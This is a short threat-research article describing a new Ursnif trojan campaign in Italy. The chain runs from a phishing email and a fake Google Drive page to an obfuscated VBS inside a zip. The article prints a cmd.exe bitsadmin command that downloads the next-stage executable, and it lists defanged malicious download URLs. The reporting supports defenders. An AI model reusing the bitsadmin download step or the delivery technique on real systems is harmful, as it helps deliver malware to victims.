The Ursnif Gangs keep Threatening Italy

by chebbi abir

Malware researchers at Cybaze-Yoroi ZLab team uncovered a new Ursnif malware campaign that reached several organizations across Italy.


The Ursnif trojan confirms itself as one of the most active malware threats in cyberspace, even during the past days, when new attack attempts reached several organizations across Italy. Cybaze-Yoroi ZLab team dissected its infection chain to keep tracking the evolution of this persistent malware threat, analyzing its multiple stages, each one with the purpose to evade detection, sometimes leveraging system tools to achieve its final objective: run the Ursnif payload.

Figure 1: Infection chain of Ursnif malware

Technical Analysis

Unlike previous waves, this one does not leverage steganography or heavily obfuscated powershell payloads. Instead, it abuses a VB script hidden into a compressed archive embedded within an innocent looking email referencing a summon. When users click on “Decreto” hyperlink, they are redirected to a Google Drive web page which opens a fake page where a fake document is shown and it invites them to click on a download link

Figure 2: Drive document “Scarica il documento”

Once clicked on the “Scarica il documento” link into the Drive document, an archive is downloaded on the victim machine from blogger[.]scentasticyoga[.]com, embedding two different files: the first is an obfuscated Visual Basic Script (VBS) and the second one is a legit image placed there to deceive the victim.

Figure 3: File contained in the Zip file

The VBS code is obfuscated to evade antivirus detection and, in order to confuse the analyst, all the values are manipulated in different steps: using many mathematical operations, very long random variable names and other content encoded in Base64 format. The malicious routine is split in many slices and then recombined at runtime, quite basic but it is effective evasion technique. After a first de-obfuscation phase, a more readable code could be obtained.

Figure 4: Malicious VBS, obfuscated (left) and de-obfuscated (right)

In the end, the infection starts and the malware runs cmd.exe to download the “eyTWUDW.exe” through the Bitsadmin utility, and store it into “%APPDATA%\Local\Temp”.

“C:\Windows\System32\cmd.exe” /c bitsadmin  /transfer msd5 /priority foreground C:\Users\admin\AppData\Local\Temp/eyTWUDW.exe

The Bitsadmin utility is legit Microsoft command line tool typically used by sysadmins to download system updates, but during the last years it has also been abused by cyber criminals to masquerade malicious network activities. In this case it has been leveraged to manage the download of the next component of the infection chain from “hxxp://blog[.practicereiki[.com/pagpoftrh54[.php”.


To read the original article:


Interdit de copier  ce contenu